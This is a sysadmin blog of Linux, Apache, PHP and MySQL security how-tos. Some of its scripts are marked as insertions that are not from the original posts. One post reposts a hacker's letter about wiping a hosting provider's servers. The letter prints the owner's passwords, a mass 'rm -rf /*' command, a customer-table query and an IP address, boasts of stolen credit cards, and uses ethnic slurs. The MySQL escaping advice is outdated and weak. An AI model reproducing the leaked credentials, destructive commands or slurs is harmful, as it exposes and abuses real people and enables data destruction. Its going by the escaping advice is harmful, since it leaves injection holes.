Admins eHow

March 18, 2010

Prevent MySQL Injection in PHP

Filed under: General, MySQL, PHP, Security — admin @ 5:21 pm

As is explained all over the web, the general solution for preventing MySQL injection attacks in PHP is to use the mysql_real_escape_string function. There are many guides on how to use it together with sprintf to escape dangerous characters before executing a MySQL query, but I found a very innovative solution in a comment on the php.net website: it recommends escaping all variables sent by the user via GET or POST at the beginning of every page that executes MySQL queries.
First make sure magic_quotes_gpc is turned off in your PHP configuration; you can check this on the phpinfo() page. This step makes sure your variables are not escaped twice.
This article explains how to disable magic quotes: Disabling Magic Quotes Guide
Put the following code at the beginning of every page that executes MySQL queries:

	include ('mysql_connect.php');

	//This stops SQL Injection in POST vars
	foreach ($_POST as $key => $value) {
		$_POST[$key] = mysql_real_escape_string($value);
	}

	//This stops SQL Injection in GET vars
	foreach ($_GET as $key => $value) {
		$_GET[$key] = mysql_real_escape_string($value);
	}

mysql_real_escape_string needs an open connection to your MySQL database when you call it, so I have placed include('mysql_connect.php'); at the beginning of the script; you can replace it with your own MySQL connect commands.

March 3, 2010

How to authenticate Apache 2 with Radius on Debian

Filed under: Apache, Debian, Security — admin @ 11:37 am

Install the Apache RADIUS module:

apt-get install libapache2-mod-auth-radius

Enable the RADIUS module for Apache:

a2enmod auth_radius

Open /etc/apache2/apache2.conf and add the following lines to the end of the file:

AddRadiusAuth IP_OF_RADIUS_SERVER:PORT SECRET 5
AddRadiusCookieValid 60

Go to /var/www, or whichever folder you want to protect, and create a .htaccess file inside it containing the following lines:

AuthType Basic
AuthName "AdminseHow Radius Authentication"
AuthBasicAuthoritative Off
AuthBasicProvider radius
AuthRadiusAuthoritative on
AuthRadiusActive On
Require valid-user

Restart Apache:

/etc/init.d/apache2 restart

For more information on the configuration options, see the following link:
http://freeradius.org/mod_auth_radius/

August 27, 2009

How to clear all iptables rules

Filed under: CentOS, Debian, General, Security — admin @ 2:08 pm

In order to flush all iptables rules, run the following commands:

iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
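The same flush with the default policies reset first and the current ruleset saved for rollback, as an added example that is not from the original post: if INPUT currently has a DROP policy, flushing the rules before changing the policy cuts off the SSH session that is issuing the commands. The IPTABLES and IPTABLES_SAVE variables are hypothetical overrides so the functions can be exercised against a stub without root.

```shell
#!/bin/sh
# Added example, not the post's own commands. Flushes every iptables rule
# in an order that cannot lock the administrator out: the post sets the
# default policies to ACCEPT last, so if INPUT is currently DROP, the -F
# that removes the "allow SSH" rule stalls the session before -P runs.
# The live ruleset is saved first so it can be put back with
# "iptables-restore < FILE". IPTABLES/IPTABLES_SAVE are overridable so
# the functions can be run against a stub (assumed names, for testing).
set -eu

IPTABLES="${IPTABLES:-iptables}"
IPTABLES_SAVE="${IPTABLES_SAVE:-iptables-save}"
BACKUP_FILE="${BACKUP_FILE:-/root/iptables-$(date +%Y%m%d-%H%M%S).rules}"

# Save the current rules of all tables; prints the path of the saved file.
save_rules() {
    "$IPTABLES_SAVE" > "$BACKUP_FILE"
    printf '%s\n' "$BACKUP_FILE"
}

# 1. default policies of the filter chains to ACCEPT, 2. flush the rules,
# delete user-defined chains and zero the counters in filter, nat, mangle.
flush_all_rules() {
    for chain in INPUT FORWARD OUTPUT; do
        "$IPTABLES" -P "$chain" ACCEPT
    done
    for table in filter nat mangle; do
        "$IPTABLES" -t "$table" -F
        "$IPTABLES" -t "$table" -X
        "$IPTABLES" -t "$table" -Z
    done
}

# Only act when invoked with --run, so the file can also be sourced.
if [ "${1:-}" = "--run" ]; then
    save_rules
    flush_all_rules
fi
```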

How to change the Windows 2003 administrator password over RDP

Filed under: General, Security, Windows — admin @ 6:48 am

In order to connect to a Windows VPS remotely, you need to use a program named "Remote Desktop Connection", which is bundled with all versions of Windows.
Under Windows XP it is located under: All Programs -> Accessories -> Communications
Under Windows Vista it is located under: All Programs -> Accessories
After running this program you will see the following window; enter the IP or host name of your VPS into the Computer field and click Connect.

After a few seconds a new window will open and you will be asked for the username and password; enter the username and password provided by your Windows VPS provider. Usually the username is Administrator.
If you enter the login details correctly, the desktop of the Windows VPS will be shown to you.

After you are logged into the VPS, follow the instructions below:

Press CTRL+ALT+END simultaneously; the following menu will appear:

Click on Change Password:

Fill in the fields and click OK.

Done :)

July 14, 2009

Limit Connections per IP using mod_limitipconn on cPanel

Filed under: Apache, CentOS, cPanel, General, Security — admin @ 9:41 am

One of the problems I had on one of my cPanel servers was that some people were using download managers to download files from the server, so hundreds of connections were being ESTABLISHED to Apache; it was becoming like a DoS attack and causing Apache to become unresponsive.
So here is what I did to limit connections per IP on a cPanel hosting server:
There is an Apache module named mod_limitipconn which takes care of it for us.
First download the latest version of mod_limitipconn from this site: http://dominia.org/djao/limitipconn2.html
Then decompress and install it.
At the time of writing the latest version is 0.23.

wget http://dominia.org/djao/limit/mod_limitipconn-0.23.tar.bz2
tar jxvf mod_limitipconn-0.23.tar.bz2
cd mod_limitipconn-0.23
/usr/local/apache/bin/apxs -cia mod_limitipconn.c

The next step is to add the required configuration to the Apache config file. We could add this directly to the end of httpd.conf, but then httpd.conf would be overwritten by EasyApache, so we will use include files to add our config instead.
Log into your WHM panel and follow these menu items:
Main >> Service Configuration >> Apache Configuration >> Include Editor
In the Post VirtualHost Include section, choose All Versions from the drop-down menu and add the following config:

<IfModule mod_limitipconn.c>
<Location />
MaxConnPerIP 10
NoIPLimit images/*
</Location>
</IfModule>

Then click Update and restart the Apache server.
Now we are all set :)

July 12, 2009

Backup Your Data in Linux by sending them to your GMail

Filed under: CentOS, Debian, General, Security — admin @ 8:33 am

A very effective way of backing up your data on a Linux server is to set a cron job on your box to mail your data to your GMail account. GMail servers are very reliable and give you a huge amount of space for free, so they are pretty suitable for backing up sensitive data.
In order to accomplish this, first create a directory named "backup" in the root directory of your box:

cd / && mkdir backup

Then you need to create a script to do the backup and mail it for you:

nano /usr/bin/backup

Copy and paste the following into the file:

#!/bin/sh
# Stage the files in /backup, compress them and mail the archive.
cd /backup || exit 1
rm -rf /backup/*
cp LIST_OF_FILES .
tar jcf backup.tar.bz2 *
echo | mutt -a backup.tar.bz2 -s "my daily backup" -- adminsehow@gmail.com

You have to change the LIST_OF_FILES string to the list of files you want backed up, separated by spaces, and change adminsehow@gmail.com to your own GMail account.
As you can see in the script, we compress the data files to make them as small as possible.
We also use "mutt" to send the emails, so you need to install it; on Debian you can install it with the following command:

apt-get install mutt

Make the script executable:

chmod +x /usr/bin/backup

Lastly you need to set up a cron job, so open the crontab with the following command:

crontab -e

and copy and paste the following line into it:

0 0 * * * /usr/bin/backup

It will run your backup script once a day :)
Also don't forget that you need a working SMTP server on your Linux box.
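A hardened version of the same job, added here as an example and not the post's script: it archives the listed paths directly (cp without -r silently skips directories and leaves a plaintext copy in /backup), keeps the archive readable by root only, and encrypts it with GnuPG before mutt sends it, so the mailbox only ever holds ciphertext. It assumes gpg is installed with the recipient's public key in root's keyring; BACKUP_RECIPIENT, MAIL_TO and the example.com addresses are placeholders.

```shell
#!/bin/sh
# Added example, not the post's script: the daily "archive and mail it"
# job, hardened. tar is pointed at the files directly, the archive is
# created root-only and encrypted to a GnuPG public key before it leaves
# the box. Assumptions: gpg with BACKUP_RECIPIENT's key in root's keyring,
# mutt and a working MTA as in the post. Addresses are placeholders.
set -eu

BACKUP_DIR="${BACKUP_DIR:-/backup}"
BACKUP_RECIPIENT="${BACKUP_RECIPIENT:-backup-key@example.com}"
MAIL_TO="${MAIL_TO:-you@example.com}"

# make_archive ARCHIVE PATH... : tar the given absolute paths into ARCHIVE,
# stored relative to / so the archive restores with "tar -C / -xzf".
make_archive() {
    archive="$1"; shift
    n=$#
    while [ "$n" -gt 0 ]; do       # rewrite each path without its leading /
        p="$1"; shift
        set -- "$@" "${p#/}"
        n=$((n - 1))
    done
    ( umask 077 && tar -C / -czf "$archive" "$@" )   # mode 600, gzip
}

# encrypt_archive ARCHIVE : encrypt to the recipient's public key, remove
# the plaintext archive, and print the name of the encrypted file.
encrypt_archive() {
    gpg --batch --yes --trust-model always -r "$BACKUP_RECIPIENT" \
        -o "$1.gpg" -e "$1"
    rm -f "$1"
    printf '%s\n' "$1.gpg"
}

# send_archive FILE : mail FILE as an attachment, as the post does with mutt.
send_archive() {
    echo | mutt -a "$1" -s "encrypted daily backup $(date +%F)" -- "$MAIL_TO"
}

# run_backup PATH... : archive, encrypt and send the given paths.
run_backup() {
    mkdir -p "$BACKUP_DIR"
    archive="$BACKUP_DIR/backup-$(date +%F).tar.gz"
    make_archive "$archive" "$@"
    send_archive "$(encrypt_archive "$archive")"
}

# Cron entry: 0 0 * * * /usr/bin/backup --run /etc /home
if [ "${1:-}" = "--run" ]; then
    shift
    run_backup "$@"
fi
```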

June 11, 2009

The letter of the hacker who wiped out almost the whole of vaserv!

Filed under: General, Security — admin @ 5:31 am

Z3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus’s passwds are
Code:

e2x2%sin0ei unf1shf4rt 3^%3df 1/2=%mod5 f0ster

f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it’s mad dawg
Code:

[root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd ‘rm -rf /* 2> /dev/null > /dev/null &’

  • Attempting to login using admin / ****off
  • Logged in, showtime!

output truncated due to massive boxen outputz
[root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null &
[1] 12399
[root@vz-vaserv .ssh]#

Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it’s GREAT!
BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you’d like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it’s just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha.
Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl

See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol
Code:

Showing rows 0 – 29 (1,361 total, Query took 0.0133 sec)
SELECT *
FROM `tblclients`
LIMIT 0 , 30

Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.

Yea yea “his IP is:64.79.210.78″ here i saved u the trouble lolol

I love to rm lol bye

~Thedefaced.org

May 16, 2009

Guide to securing the server using DenyHosts

Filed under: CentOS, Debian, General, Security — admin @ 9:20 am

One of the greatest tools I have found to secure a server from brute-force attacks and keep it out of the reach of hackers is DenyHosts.
What DenyHosts does is very simple but very effective: it processes auth.log (on Debian-based distros) or secure.log (on Red Hat-based distros), finds unsuccessful login attempts through SSH, and blocks the attacker through the /etc/hosts.deny file.
It also has a central server which can synchronize all DenyHosts instances around the world, so if an attacker is detected in the US, it will be blocked all over the world very quickly! This option needs to be enabled in the config file, though.
DenyHosts is an open source project and is available for download at SourceForge: http://denyhosts.sourceforge.net

As my favourite distro is Debian, I will show you how to install and use it on Debian, but the steps are almost the same on CentOS.
DenyHosts is available through the Debian repos, so you can simply install it with:

apt-get install denyhosts

Then you need to configure it; the configuration file is located at /etc/denyhosts.conf.
I suggest you read the whole file and understand it; it is worth the time. But in case you need a good working configuration, you can use mine:

SECURE_LOG = /var/log/auth.log
HOSTS_DENY = /etc/hosts.deny
PURGE_DENY = 1w
PURGE_THRESHOLD = 2
BLOCK_SERVICE  = sshd
DENY_THRESHOLD_INVALID = 5
DENY_THRESHOLD_VALID = 10
DENY_THRESHOLD_ROOT = 1
DENY_THRESHOLD_RESTRICTED = 1
WORK_DIR = /var/lib/denyhosts
SUSPICIOUS_LOGIN_REPORT_ALLOWED_HOSTS=YES
HOSTNAME_LOOKUP=YES
LOCK_FILE = /var/run/denyhosts.pid
ADMIN_EMAIL = youremail@domain.com
SMTP_HOST = localhost
SMTP_PORT = 25
SMTP_FROM = DenyHosts <nobody@domain.com>
SMTP_SUBJECT = DenyHosts Report
AGE_RESET_VALID=5d
AGE_RESET_ROOT=25d
AGE_RESET_RESTRICTED=25d
AGE_RESET_INVALID=10d
DAEMON_LOG = /var/log/denyhosts
DAEMON_SLEEP = 30s
DAEMON_PURGE = 1h
SYNC_SERVER = http://xmlrpc.denyhosts.net:9911
SYNC_INTERVAL = 1h
SYNC_UPLOAD = yes
SYNC_DOWNLOAD = yes
SYNC_DOWNLOAD_THRESHOLD = 3
SYNC_DOWNLOAD_RESILIENCY = 5h

Don't forget to set ADMIN_EMAIL and SMTP_FROM to your own email addresses.
One of the important steps you should take is to add your own IP address to the whitelist so it doesn't get blocked.
To do this, open the /var/lib/denyhosts/allowed-hosts file and enter your own IP in it.
If you have forgotten to do this and are now blocked from the server, you need to connect to the server from another IP address and do the following steps:

1. Stop DenyHosts:

/etc/init.d/denyhosts stop

2. Remove the IP address from /etc/hosts.deny
3. You also need to remove your IP address from any file located in /var/lib/denyhosts; first look which files contain your IP:

grep Your_IP *

Then remove the IP from those files using your favourite editor or method ;)

Edit: I have found a great way to delete your IP from all files at once.

sed -i '/Your_IP/d' *

4. Consider adding the IP address to /var/lib/denyhosts/allowed-hosts
5. Start DenyHosts
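A way to do steps 2 and 3 without the substring problem, as an added example that is not from the original post: a sed pattern written as `/Your IP/d` treats each dot of the address as a wildcard and also matches inside longer addresses, so removing 10.0.0.1 would delete the entries for 10.0.0.10 as well. The file paths and the line formats it assumes for DenyHosts are stated in the comments.

```shell
#!/bin/sh
# Added example, not part of the original post: remove one IP address from
# /etc/hosts.deny and from every DenyHosts data file, matching it only as
# a whole address. A pattern like "/Your IP/d" treats each dot as a
# wildcard and matches substrings, so removing 10.0.0.1 would also delete
# the entries for 10.0.0.10 and 110.0.0.1. Paths are overridable for tests.
set -eu

HOSTS_DENY="${HOSTS_DENY:-/etc/hosts.deny}"
WORK_DIR="${WORK_DIR:-/var/lib/denyhosts}"

# Escape the dots of an address so each matches only a literal dot.
ip_regex() {
    printf '%s' "$1" | sed 's/\./\\./g'
}

# ERE that matches IP as a whole token. DenyHosts writes lines such as
# "sshd: 10.0.0.1" in hosts.deny and "10.0.0.1:5:2009-05-16-09-20-00" in
# its work files (assumed formats), so the address is delimited by start
# or end of line, whitespace, or a colon.
ip_line_pattern() {
    printf '(^|[[:space:]:])%s([[:space:]:]|$)' "$(ip_regex "$1")"
}

# remove_ip_from_file IP FILE : delete every line mentioning IP (GNU sed -i).
remove_ip_from_file() {
    sed -E -i "/$(ip_line_pattern "$1")/d" "$2"
}

# count_ip_lines IP FILE : how many lines still mention IP (0 when none).
count_ip_lines() {
    grep -cE "$(ip_line_pattern "$1")" "$2" || true
}

# unblock_ip IP : steps 2 and 3 of the post in one go. Run it with
# DenyHosts stopped, then add IP to $WORK_DIR/allowed-hosts and start it.
unblock_ip() {
    remove_ip_from_file "$1" "$HOSTS_DENY"
    for f in "$WORK_DIR"/*; do
        if [ -f "$f" ]; then
            remove_ip_from_file "$1" "$f"
        fi
    done
}
```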

May 13, 2009

How to block access to a file using .htaccess

Filed under: General, Security — admin @ 1:33 pm

If you have a file in your web directory which you want to keep secure, you can block access to it with the following lines in your .htaccess file:

<Files FILENAME>
deny from all
</Files>

May 12, 2009

Secure Your WebServer by Disabling Dangerous PHP Functions

Filed under: CentOS, cPanel, Debian, General, Security — admin @ 8:02 pm

In order to secure your web server you need to disable some PHP functions which may be used to hack your server.
Open your php.ini file and search for "disable_functions", then replace it with the following directive:

disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

After this step you need to restart the Apache server.
If you have cPanel installed on your server, you need to run the following command over SSH for cPanel to work properly:

/scripts/makecpphp

It will build a separate instance of PHP for internal cPanel/WHM use.
